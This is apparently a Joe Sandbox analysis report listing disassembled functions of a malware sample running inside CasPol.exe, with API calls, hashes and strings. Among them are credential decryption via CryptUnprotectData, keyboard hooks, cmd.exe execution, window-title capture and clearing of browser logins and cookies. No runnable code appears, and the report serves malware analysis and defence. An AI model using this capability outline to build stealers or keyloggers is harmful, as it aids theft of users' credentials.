                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                          • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                          • API String ID: 2574300362-2380590389
                                                                                                                                                                          • Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                                                                                                                                          • Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
                                                                                                                                                                          • Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                          • String ID: Connection Timeout
                                                                                                                                                                          • API String ID: 2055531096-499159329
                                                                                                                                                                          • Opcode ID: 84b80ad7d3cdc11d311d6a55cfd00aa66ecc2c725afd842c636cda6babbb0f1b
                                                                                                                                                                          • Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
                                                                                                                                                                          • Opcode Fuzzy Hash: 84b80ad7d3cdc11d311d6a55cfd00aa66ecc2c725afd842c636cda6babbb0f1b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
                                                                                                                                                                          APIs
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                                                                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                                                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00413893
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                                                                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                          • API String ID: 3628047217-1405518554
                                                                                                                                                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: h}v
                                                                                                                                                                          • API String ID: 3677997916-2591199288
                                                                                                                                                                          • Opcode ID: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                                                                                                          • Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                                                                                                                                          • Opcode Fuzzy Hash: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                                                                                                          • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                          • API String ID: 186401046-604454484
                                                                                                                                                                          • Opcode ID: c28b7efb6e9b123e9bbf35ecfc69271c77d7c0d816cf9c8e66969055ba9ab20b
                                                                                                                                                                          • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                                                                                                                                                          • Opcode Fuzzy Hash: c28b7efb6e9b123e9bbf35ecfc69271c77d7c0d816cf9c8e66969055ba9ab20b
                                                                                                                                                                          • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                          • String ID: /C $cmd.exe$open
                                                                                                                                                                          • API String ID: 587946157-3896048727
                                                                                                                                                                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                                                          APIs
                                                                                                                                                                          • TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,xtv,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                          • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 3123878439-4028850238
                                                                                                                                                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                                                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                          • API String ID: 1646373207-2714051624
                                                                                                                                                                          • Opcode ID: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                                                                                          • Instruction ID: dd969ba971dbaa29921178884ad428293cf5128bfb63f122c38d39e9abecacc1
                                                                                                                                                                          • Opcode Fuzzy Hash: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                                                                                          • Instruction Fuzzy Hash: 3EB09B74541740FB8F102B745D4D5153525A604703B100475F041D6151D7B584009A1E
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                          • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                          • API String ID: 2574300362-1519888992
                                                                                                                                                                          • Opcode ID: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                                                                                          • Instruction ID: c0691e7ba4e037ba5be4177d0f13c81de84985c40ff74287bb3597843e96be7a
                                                                                                                                                                          • Opcode Fuzzy Hash: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                                                                                          • Instruction Fuzzy Hash: 5FB092B8580340FBCB002BA0AD4E91E3A64AA18703B1008ABF041D21A1EBB888009F2F
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                          • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                                                                          • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                          • API String ID: 3472027048-1236744412
                                                                                                                                                                          • Opcode ID: a73d71a880a73223254e5f03a8505615f8b3103e8cb97acb8028f95b4e73a55e
                                                                                                                                                                          • Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
                                                                                                                                                                          • Opcode Fuzzy Hash: a73d71a880a73223254e5f03a8505615f8b3103e8cb97acb8028f95b4e73a55e
                                                                                                                                                                          • Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
                                                                                                                                                                          APIs
                                                                                                                                                                          • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                                                                                                          • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                                                                                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                                                                                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1432082543-0
                                                                                                                                                                          • Opcode ID: c58b57dd9af4a49378f42194896e7d036c46d7cd0d1b3e9acb4da555486fb0a3
                                                                                                                                                                          • Instruction ID: 4e205714844368780eb3fe3bece650c19c238011f91973e0c27c34c3c25c0944
                                                                                                                                                                          • Opcode Fuzzy Hash: c58b57dd9af4a49378f42194896e7d036c46d7cd0d1b3e9acb4da555486fb0a3
                                                                                                                                                                          • Instruction Fuzzy Hash: D821A0721083016BD321DF16DC88DABBBECEBE1754F00052FF449D2190EBB4DA49C66A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                                                                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                                                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                          • String ID: [ $ ]
                                                                                                                                                                          • API String ID: 3309952895-93608704
                                                                                                                                                                          • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                                                                          • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 188215759-0
                                                                                                                                                                          • Opcode ID: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                                                                                                                                                          • Instruction ID: 34fec0fc5de9b46989c99fc374850f6e4511d06c61be9fc580282ef5e3b3a0c9
                                                                                                                                                                          • Opcode Fuzzy Hash: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
